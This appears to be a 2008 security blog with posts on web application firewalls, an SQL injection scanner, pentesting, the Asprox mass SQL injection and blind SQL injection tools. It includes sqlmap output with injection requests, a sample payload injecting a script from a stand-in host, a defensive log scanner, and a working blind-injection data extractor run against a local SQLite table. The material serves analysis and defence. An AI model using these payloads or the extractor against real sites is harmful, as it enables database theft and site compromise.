Friday, June 27, 2008

Waf me not

| Armando Romeo |
Which side of the field are you in?

There's only one hot topic in the industry right now:
Web application firewalls.

Infosec big names are fighting a war worth millions of dollars over whether Web Application Firewalls are a viable solution to web application security issues.

Understanding who the parties on the field are is critical to following the discussion without being fooled by subliminal marketing messages.


The CTO of company X, in order to become PCI compliant, reads the standard, which says there are two options:
Source code review
OR
Web application Firewall

What does he expect from a WAF here? He trusts the PCI standard. He thinks that if a WAF is an alternative to source code analysis, then the two provide more or less the same security.

So WAF vendors, empowered by PCI compliance, can push their products and advertise them as a plug-and-play security solution.

There's nothing worse than a false sense of safety.

Feeling self-confident about security because you have a WAF in front of your web server is the beginning of all your problems.

I have read WAF vendors commenting on blog posts. They all say something like "yes, we never said it is bullet-proof; it's just part of a broader solution we offer".

What broader solution? VA + WAF?
Is this really the security companies need?
Do you really think that automated tools (the ones we have now) are capable of securing anything?

Automated tools that miserably fail to detect even blind SQL injections or CSRF vulnerabilities, feeding rules to a WAF that is in turn miserably unable to protect against simple, very simple coding errors: a missing check on an authentication cookie, a logic flaw, an information leakage bug?

And no, taking the web back to what it was 3-4 years ago by encrypting the query string to prevent tampering is not the solution in my opinion.
The trade-off between business and security should be avoided as much as possible.

There's also a big difference between security that is needed and security that is required.

WAFs respond to a demand for required security.
A provable security.

"Hey I do care about my customers data. I have a WAF!"

An honest security consultancy carrying out penetration testing and source code review responds to a security need.

"Hey I do care about my customers data. I have plenty of good guys trying to hack and fix me every month"

At SecurityBrigade we do not push any WAF sale, although we recognize it as a valid means to avoid common, simple (but still dangerous) vulnerabilities.

We promote real, expert, man-made penetration testing jobs and source code reviews.

WAFs as further layers are proposed to clients in order to cover them in case the code changes for some reason and new vulnerabilities are introduced after our last review.
It must be made clear that the further the code drifts from what was reviewed, the lower the security level is. No matter how cool the WAF is.

Another aspect to take into consideration is the operational cost of such devices. Are they, all in all, worth the money?
Let's forget about PCI for a moment: are they really responding to the need for real security? Not at the moment.
They are responding to a quick need for security.
In the long run that becomes "cheap security".
And cheap refers to quality, not to expense.

And by the way, I'm from the old-school side, but I like innovation.
We just have to spend more on people, not on technology.

Because my hotel in Paris, while I write this blog post, has asked me to send my credit card number by email.
Would a WAF solve that?

Tuesday, June 24, 2008

HP and MS give us a new SQL Injection tool

| Armando Romeo |

Just downloaded it and I'm trying it while I write.
After the recent mass SQL injection attacks Microsoft asked HP (which owns SPI Labs) to create a tool to detect potential SQL injections in a site.

The tool is named Scrawlr and is downloadable from HP here.

It first acts as a crawler (SQL injection Crawler).
Then it makes a list of dynamic pages and finally tries injecting SQL injection payloads to prove the existence of the vulnerability.



I must say it is nothing impressive. It is limited in the number of links crawled (it picked up just a small fraction of the actual links in my local Joomla installation).


I even created a simple page with a basic blind SQLi vulnerability, but it didn't recognize the injection.
It's just a matter of comparing two outputs obtained with two different attack payloads. But nothing. It seems the tool only looks for known SQL errors in the returned page and has no blind SQL injection detection.

Further tests should be done, but it's 2 am in Italy, so I hope to read your comments about the tool when I wake up...

Monday, June 23, 2008

Penetration testing as an art

| Armando Romeo |

I found Chris Eng's post about the correct definition of penetration testing quite interesting. Whether you consider it an art or a science is not just a play on words or a way to make you feel like Einstein or Michelangelo.

It's a way to have it carried out the correct way.

In penetration testing, the approach (modus operandi) is most of the time much more important than the tools or checklists you use.



While some, aided by the checklist-type security that has become so trendy recently, think that penetration testing is a science, a lot of other experts look at it as an art.

I believe both are wrong. Security is known to be one of the most difficult problems an engineer has to solve. Above all if you stand on the good guys' side.

"Only people in this room will understand what I am now going to say. It is this: Security is perhaps the most difficult intellectual profession on the planet."


This is what Dan Geer said in a keynote at SOURCE Boston.

Actually it's this difficulty that makes some think that security, and specifically penetration testing, is an art and not a science.

It's not, IMHO, the fact that a problem has too many variables and factors to take into consideration that means it takes a talented mind to solve it. In that case it's all a matter of skills.

If you could master all the possible aspects, details, behaviours and even the most hidden tricks of the system you're pentesting, it would probably be merely a science, since it would engage your experience and skills and not your talent as a genius mind.

It would just require your past knowledge and not your intuition.

There's a sharp distinction between intellect and experience.

The problem is that you can never know all the details, behaviours and features of your target, because every target has its own level of uniqueness.

And this is where the innate ability of intuition comes in handy, or rather becomes *necessary*, to master the most difficult intellectual profession on the planet.

It's right here that science leaves the scene to art.

A talented penetration tester wouldn't only tick off the checklist but would find new, unlisted methods to achieve his goal of breaking into or securing the system he's on.

Logic flaws come to mind here. And how could I forget social engineering. In the end, Mitnick is probably the most renowned hacker ever just because of his innate talent. I don't remember him being celebrated for elite attacks learned in some ethical hacker certification course.
(Which you have to master anyway if you want to enter the field.)

Neither social engineering nor logic flaws can be addressed through a purely scientific approach to the problem. No tools, baby, and no checklist.

That's why I believe that, yes, penetration testing must have an agreed and standardized scientific approach, based on checklists, best practices etc.
But for each check in that list, for each of those steps in the scientific/deterministic process of penetration testing, there must be space left for further investigation driven by talent.

And talent is not something you achieve with a CISSP. You're right, dre.
Day-by-day hands-on practice is the only training for your talent.

If I needed a penetration tester I would ask him how many years of experience he had in the trenches rather than how many certs.
And possibly whether he had a past as a hacker.
Real hackers have some talent, and hands-on practice by definition.

I don't believe in born white-hat security professionals.
No matter how CISSP they are.
Do you?

Thursday, June 19, 2008

Have you been hit by Mass SQL Injection?

| Armando Romeo |

Mass SQL injection has been the most important threat experienced by the security (and webmaster) community from April 2008 until now.

Over 510,000 servers have been successfully exploited using the same payload and a few variants of the same exploit.

At first the attack was believed to be malware able to propagate to vulnerable servers through SQL commands.


A further forensic study demonstrated that the attack is instead generated by thousands of bots crawling the net for vulnerable web applications, the Asprox botnet (15,000 infected hosts as of March 08) above all.

The potential targets are found through Google dorks, and the attack injects a payload that rewrites every string-type field of the database to carry a JavaScript payload downloaded from certain domain names.

The JavaScript is then executed in the browsers of the vulnerable websites' visitors, attempting a forced download of an online-gaming trojan horse as well as adware. Or just more Asprox listeners...

The targeted web applications seemed to be only ASP pages using Microsoft SQL Server, but more variants of this kind of attack are being discovered targeting different languages and server platforms.

For the sake of clarity: the exploitation is made possible by poorly written web applications; no vulnerability exists in IIS or SQL Server.

A tool is available to check whether your web server has been hit by the Danmec/Asprox botnet: SQLInjectionFinder.

It basically scans your IIS logs looking for known exploit payloads such as "CAST(" statements. This tool is much better than running an automated scanning tool against your web site scripts, although secure scripts or a WAF "in front" of them would surely have mitigated the impact of the attack.
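As an added example (not the post's own code, nor SQLInjectionFinder's), here is the kind of check that tool performs, written in Python: it walks IIS W3C log lines, finds query strings carrying a hex-encoded CAST(0x... AS VARCHAR) wrapper, and decodes the hex so the responder can see which statement EXEC() actually ran against the database. The log lines, the client addresses, the script names and the decoded UPDATE statement are all constructed for the example and are not taken from a real incident.

```python
import re
import urllib.parse

# The bots hex-encode the real statement inside CAST(0x... AS VARCHAR(n))
# and EXEC() it, so a filter looking for UPDATE or <script> in the query
# string never sees it. This matches the wrapper after URL-decoding.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.I)


def decode_cast_hex(hexdigits):
    """Recover the SQL that EXEC() actually ran from the hex literal.
    NVARCHAR payloads are UTF-16LE (every second byte is 0x00)."""
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]          # literal cut off by log truncation
    raw = bytes.fromhex(hexdigits)
    if len(raw) >= 2 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def scan_iis_log(lines):
    """Return one record per request carrying the payload. Column positions
    come from the log's own #Fields: directive, so the field order may vary."""
    idx, hits = None, []
    for line in lines:
        if line.startswith("#Fields:"):
            idx = {name: i for i, name in enumerate(line.split()[1:])}
            continue
        if line.startswith("#") or not line.strip() or idx is None:
            continue
        cols = line.split()
        if len(cols) != len(idx):
            continue                        # malformed line, skip it
        query = urllib.parse.unquote_plus(cols[idx["cs-uri-query"]])
        # second decode catches bots that URL-encoded the payload twice
        m = CAST_HEX.search(query) or CAST_HEX.search(urllib.parse.unquote_plus(query))
        if m:
            hits.append({"time": cols[idx["date"]] + " " + cols[idx["time"]],
                         "client": cols[idx["c-ip"]],
                         "stem": cols[idx["cs-uri-stem"]],
                         "sql": decode_cast_hex(m.group(1))})
    return hits


# Constructed sample: the statement a bot would EXEC(), then the W3C log
# lines a hit would leave behind. Neither comes from a real incident.
_INJECTED_SQL = ("UPDATE products SET name=name+"
                 "'<script src=http://example.invalid/b.js></script>'")
_PAYLOAD = ("id=6;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
            + _INJECTED_SQL.encode("ascii").hex().upper()
            + "%20AS%20VARCHAR(4000));EXEC(@S);--")
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status",
    "2008-06-19 03:12:01 10.0.0.5 GET /products.asp id=6 80 - 192.0.2.10 Mozilla/4.0 200",
    "2008-06-19 03:12:07 10.0.0.5 GET /products.asp " + _PAYLOAD
    + " 80 - 198.51.100.23 Mozilla/4.0 200",
    "2008-06-19 03:12:09 10.0.0.5 GET /about.asp - 80 - 192.0.2.11 Mozilla/4.0 200",
]

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["stem"])
        print("  executed:", hit["sql"])
```

Decoding the literal is the part worth keeping: the hex wrapper is exactly what lets the payload slip past keyword filters and log greps for UPDATE or <script>, so a check that stops at "CAST(" confirms the hit but not which tables and columns were rewritten.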

Time to acquire some WAF vendors' stocks now.

Monday, June 16, 2008

Optimized Blind Sql Injection

| Armando Romeo |
Blind SQL injection is a technique that lets attackers retrieve database data through a SQL injection that doesn't give out useful information through web application errors.

Security by obscurity is not security though. Sqlmap and Absinthe demonstrate this clearly. They are capable of getting you the whole database even if no error is shown when the user inputs characters meant to trigger a SQL error.


So how is it possible to still get database data without triggering web application errors?
These tools basically work on a true/false basis. They provide the web app with input known to be wrong to trigger a FALSE case and input known to be right to trigger a TRUE case.

Using the TRUE/FALSE condition, a loop through the charset is undertaken to recover a string from the database one character at a time. Usually SUBSTRING/ASCII-type SQL functions (MID/ORD on MySQL, as in the output below) are used to test one character guess against the TRUE case.

The problem with this approach is the time it takes to retrieve data from the database.
Most of the tools for blind SQL injection are not optimized.
Recently I came across some nice research from Secforce.

They have written a quick tool to optimize the task of dumping a database through a blind SQL injection.

The tool, written in Python, is basically a shell.
You provide parameters such as the vulnerable web page and then it retrieves the desired portion of the database (table names, column names or full data), nothing different from all the other SQL injection tools.

What makes this tool better than the others (for blind SQLi) is its speed, thanks to the optimizations used to find characters.
You can read more about the implemented optimizations here.
From a test I ran myself, I noticed that sqlmap is the tool that is best (together with the Secforce blind SQL injection tool) at dumping data through blind SQL injection.

Here's the dump from the console of an injection process using sqlmap:


C:\hack\SQL\sqlmap>sqlmap.py --url="http://localhost/vuln.asp?i=6" -p i -v 3 -b --string="Ciao"

sqlmap/0.6-rc5 coded by inquis and belch

[14:33:38] [DEBUG] request:http://localhost/vuln.asp?i=6
[14:33:43] [INFO] testing if GET parameter 'i' is dynamic
[14:33:43] [DEBUG] request:http://localhost/vuln.asp?i=47
[14:33:46] [INFO] confirming that GET parameter 'i' is dynamic
[14:33:46] [DEBUG] request:http://localhost/vuln.asp?i='NoValue
[14:33:48] [DEBUG] request:http://localhost/vuln.asp?i="NoValue
[14:33:50] [INFO] GET parameter 'i' is dynamic
[14:33:50] [INFO] testing sql injection on GET parameter 'i'
[14:33:50] [INFO] testing numeric/unescaped injection on GET parameter 'i'
[14:33:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=3
[14:33:52] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=4
[14:33:55] [INFO] confirming numeric/unescaped injection on GET parameter 'brandid'
[14:33:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND NoValue
[14:33:57] [INFO] GET parameter 'i' is numeric/unescaped injectable
[14:33:57] [INFO] testing MySQL
[14:33:57] [INFO] query: CONCAT('6', '6')
[14:33:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 63
[14:33:58] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 31
[14:34:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 15
[14:34:03] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 7
[14:34:05] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 3
[14:34:07] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 1
[14:34:09] [INFO] retrieved:
[14:34:09] [INFO] performed 6 queries in 12 seconds
[14:34:09] [WARNING] the remote DBMS is not MySQL

As you can see above, sqlmap starts by testing whether the first character of our banner has an ASCII value greater than 63 (that is, 127/2), then halves the interval at each following query. Not in our case.

[14:34:09] [INFO] testing Oracle
[14:34:09] [INFO] query: LENGTH(SYSDATE)
[14:34:09] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 63
[14:34:11] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 31
[14:34:13] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 15
[14:34:15] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 7
[14:34:17] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 3
[14:34:19] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 1
[14:34:21] [INFO] retrieved:
[14:34:21] [INFO] performed 6 queries in 12 seconds
[14:34:21] [WARNING] the remote DBMS is not Oracle
[14:34:21] [INFO] testing PostgreSQL
[14:34:21] [INFO] query: COALESCE(5, NULL)
[14:34:21] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 63
[14:34:23] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 31
[14:34:25] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 15
[14:34:27] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 7
[14:34:29] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 3
[14:34:32] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 1
[14:34:34] [INFO] retrieved:
[14:34:34] [INFO] performed 6 queries in 12 seconds
[14:34:34] [WARNING] the remote DBMS is not PostgreSQL
[14:34:34] [INFO] testing Microsoft SQL Server
[14:34:34] [INFO] query: LTRIM(STR(LEN(1)))
[14:34:34] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 63
[14:34:36] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 31
[14:34:38] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 47
[14:34:41] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 55
[14:34:43] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 51
[14:34:45] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 49
[14:34:46] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 48
[14:34:48] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 63
[14:34:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 31
[14:34:53] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 15
[14:34:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 7
[14:34:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 3
[14:35:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 1
[14:35:03] [INFO] retrieved: 1
[14:35:03] [INFO] performed 13 queries in 28 seconds
remote DBMS: Microsoft SQL Server

The process above is discussed in the paper released by Secforce.
Sqlmap retrieved the database banner/version in approx. 60 seconds.

The Blind SQL Injection shell did it in 80 seconds, because it retrieves all the characters one by one and is thus able to retrieve any kind of banner with 100% precision, while sqlmap only needs a few characters to match against its list of default banners.
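The TRUE/FALSE extraction described above, and the "compare two outputs for two payloads" test that the Scrawlr post says that tool lacks, as an added example in Python (not code from this post, from sqlmap or from the Secforce tool). The target is a constructed in-memory SQLite table standing in for vuln.asp; the attacker sees only whether the marker string "Ciao" is still in the page, exactly like sqlmap's --string option. The example dumps the same value with the naive charset loop and with the bisection that sqlmap's log shows, counting the requests each method sends, and then runs the same injection against a parameterised query to show it going nowhere. SQLite's unicode()/substr() stand in for ORD()/MID() and ASCII()/SUBSTRING(); the search covers 7-bit ASCII only, so a character above 127 would be retrieved wrongly.

```python
import sqlite3
import string


class Target:
    """Stand-in for vuln.asp over an in-memory SQLite table (constructed here).
    safe=False concatenates the parameter into the SQL, which is the flaw;
    safe=True binds it as a parameter, so the injected text is only data."""

    def __init__(self, safe=False):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE products (id INTEGER, name TEXT)")
        self.db.execute("INSERT INTO products VALUES (6,'Ciao'), (7,'Hola')")
        self.safe = safe
        self.requests = 0               # what a real attack would send over HTTP

    def page(self, i):
        self.requests += 1
        try:
            if self.safe:
                cur = self.db.execute("SELECT name FROM products WHERE id=?", (i,))
            else:
                cur = self.db.execute("SELECT name FROM products WHERE id=" + i)
            rows = cur.fetchall()
        except sqlite3.Error:
            rows = []                   # error swallowed: no SQL error shown
        return "<html>" + "".join(r[0] for r in rows) + "</html>"


def oracle(target, condition):
    """TRUE when the marker string survives the injected AND, else FALSE."""
    return "Ciao" in target.page("6 AND " + condition)


def char_cond(expr, pos, op, value):
    """SQLite spelling of the ORD(MID())/ASCII(SUBSTRING()) tests in the log.
    Past the end of the string unicode('') is NULL, so every test is FALSE."""
    return f"unicode(substr(({expr}),{pos},1)) {op} {value}"


def extract_linear(target, expr, charset=string.printable.strip()):
    """Unoptimised: try '= ord(c)' for every charset member, in order."""
    out, pos = "", 1
    while True:
        for c in charset:
            if oracle(target, char_cond(expr, pos, "=", ord(c))):
                out += c
                break
        else:
            return out                  # nothing matched: end of string
        pos += 1


def extract_bisect(target, expr):
    """sqlmap-style bisection of the 7-bit range: 7 queries per character
    plus one '> 0' test to learn whether a character exists at all."""
    out, pos = "", 1
    while oracle(target, char_cond(expr, pos, ">", 0)):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(target, char_cond(expr, pos, ">", mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
        pos += 1
    return out


def compare(expr="(SELECT name FROM products WHERE id=7)"):
    """Dump the same value both ways; return {method: (value, requests sent)}."""
    lin, bis = Target(), Target()
    return {"linear": (extract_linear(lin, expr), lin.requests),
            "bisect": (extract_bisect(bis, expr), bis.requests)}


if __name__ == "__main__":
    for method, (value, n) in compare().items():
        print(f"{method:7s} -> {value!r} after {n} requests")
    safe = Target(safe=True)
    print("parameterised ->", repr(extract_bisect(safe, "(SELECT name FROM products WHERE id=7)")))
```

The request count is the whole point of the Secforce optimisation: the charset loop needs as many requests as the position of each character in the charset, plus a full pass to detect the end of the string, while bisection is a fixed eight per character. Against the parameterised target every injected condition is just a non-numeric id, so the oracle never returns TRUE and nothing is recovered.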

A video showing the basic functions of the tool is available from the Secforce tool page. Only con: it doesn't support the use of a proxy as of now. (It's open source, so anyone can add this feature easily.)
